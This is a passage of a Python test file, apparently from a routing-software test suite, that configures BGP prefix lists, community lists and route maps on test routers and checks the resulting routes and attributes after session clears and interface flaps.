for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
for addr_type in ADDR_TYPES:
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Remove/Delete prefix list
input_dict_3 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
"delete": True,
}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 100,
"network": "any",
"action": "permit",
"delete": True,
}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_prefix_lists(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Api call to clear bgp, so config changes would be reflected
dut = "r3"
result = clear_bgp_and_verify(tgen, topo, dut)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_add_and_remove_community_list_referenced_by_rmap_p0():
"""
TC_51:
Add and remove community-list referencec by route-map match cluase
and verifying it reflecting as intended
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Creating configuration from JSON
# build_config_from_json(tgen, topo)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_5 = {
"r1": {
"route_maps": {
"rm_r1_out_{}".format(addr_type): [
{
"action": "permit",
"set": {
"large_community": {"num": "1:1:1 1:2:3 2:1:1 2:2:2"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_6 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rm_r1_out_ipv4",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rm_r1_out_ipv6",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
for addr_type in ADDR_TYPES:
# Create standard large commumity-list
input_dict_1 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "rmap_lcomm_{}".format(addr_type),
"value": "1:1:1 1:2:3 2:1:1 2:2:2",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verify BGP large community is created
result = verify_create_community_list(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
for addr_type in ADDR_TYPES:
# Create route map
input_dict_2 = {
"r3": {
"route_maps": {
"rm_r3_in_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"large-community-list": {
"id": "rmap_lcomm_" + addr_type
}
}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_3 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rm_r3_in_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rm_r3_in_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
sleep(5)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verify large-community-list
dut = "r3"
networks = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
input_dict_4 = {"largeCommunity": "1:1:1 1:2:3 2:1:1 2:2:2"}
for addr_type in ADDR_TYPES:
result = verify_bgp_community(
tgen, addr_type, dut, networks[addr_type], input_dict_4
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_multiple_match_statement_in_route_map_logical_ORed_p0():
"""
TC_45:
Test multiple match statements as part of a route-map"s single
sequence number. (Logical OR-ed of multiple match statements)
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Api call to advertise networks
input_dict_nw1 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {"advertise_networks": [{"network": "10.0.30.1/32"}]}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_nw1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Api call to advertise networks
input_dict_nw2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {"advertise_networks": [{"network": "20.0.30.1/32"}]}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "2::1/128"}]}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_nw2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_2_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_2_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_3_addr_type = {}
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
}
]
}
}
}
input_dict_3_addr_type[addr_type] = input_dict_3
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 200},
}
]
}
}
}
input_dict_3_addr_type[addr_type] = input_dict_3
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_6 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {"ipv4": ["10.0.30.1/32"], "ipv6": ["1::1/128"]}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3_addr_type[addr_type],
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
routes = {"ipv4": ["20.0.30.1/32"], "ipv6": ["2::1/128"]}
for addr_type in ADDR_TYPES:
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_multiple_match_statement_in_route_map_logical_ANDed_p1():
"""
TC_44:
Test multiple match statements as part of a route-map"s single
sequence number. (Logical AND of multiple match statements)
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_5 = {
"r1": {
"route_maps": {
"rm_r1_out_{}".format(addr_type): [
{
"action": "permit",
"set": {
"large_community": {"num": "1:1:1 1:2:3 2:1:1 2:2:2"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
for addr_type in ADDR_TYPES:
input_dict_6 = {
"r1": {
"bgp": {
"address_family": {
addr_type: {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rm_r1_out_{}".format(
addr_type
),
"direction": "out",
}
]
}
}
}
}
}
}
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
for addr_type in ADDR_TYPES:
# Create standard large commumity-list
input_dict_1 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "rmap_lcomm_{}".format(addr_type),
"value": "1:1:1 1:2:3 2:1:1 2:2:2",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verify BGP large community is created
result = verify_create_community_list(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
for addr_type in ADDR_TYPES:
# Create route map
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"large_community_list": {
"id": "rmap_lcomm_" + addr_type
}
}
},
"set": {
"locPrf": 150,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
for addr_type in ADDR_TYPES:
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
addr_type: {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_{}".format(
addr_type
),
"direction": "in",
}
]
}
}
}
}
}
}
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# sleep(10)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_add_remove_rmap_to_specific_neighbor_p0():
"""
TC_41:
Test add/remove route-maps to specific neighbor and see if
it takes effect as intended
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "deny"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "deny"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \n Error Routes are still present: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Remove applied rmap from neighbor
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
"delete": True,
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
"delete": True,
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_clear_bgp_and_flap_interface_to_verify_rmap_properties_p0():
"""
TC_56:
Test clear BGP sessions and interface flaps to see if
route-map properties are intact.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150, "weight": 100},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# clear bgp, so config changes would be reflected
dut = "r3"
result = clear_bgp_and_verify(tgen, topo, dut)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Flap interface to see if route-map properties are intact
# Shutdown interface
dut = "r3"
intf = "r3-r1-eth0"
shutdown_bringup_interface(tgen, dut, intf, False)
sleep(5)
# Bringup interface
dut = "r3"
intf = "r3-r1-eth0"
shutdown_bringup_interface(tgen, dut, intf, True)
# Verify BGP convergence once interface is up
result = verify_bgp_convergence(tgen, topo)
assert result is True, "setup_module :Failed \n Error:" " {}".format(result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_rmap_without_match_and_set_clause_p0():
"""
TC_46:
Verify if a blank sequence number can be create(without any
match/set clause) and check if it allows all the traffic/prefixes
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_no_match_set_1_{}".format(addr_type): [
{"action": "permit", "seq_id": "5"}
],
"rmap_no_match_set_2_{}".format(addr_type): [
{"action": "deny", "seq_id": "5"}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_no_match_set_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_set_localpref_weight_to_ebgp_and_med_to_ibgp_peers_p0():
"""
TC_48:
Create route map setting local preference and weight to eBGP peeer
and metric to ibgp peer and verifying it should not get advertised
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
input_dict_3_addr_type = {}
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
}
],
"rmap_match_pf_3_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"weight": 1000},
}
],
}
}
}
input_dict_3_addr_type[addr_type] = input_dict_3
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
"r5": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_3_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
"r5": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_3_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
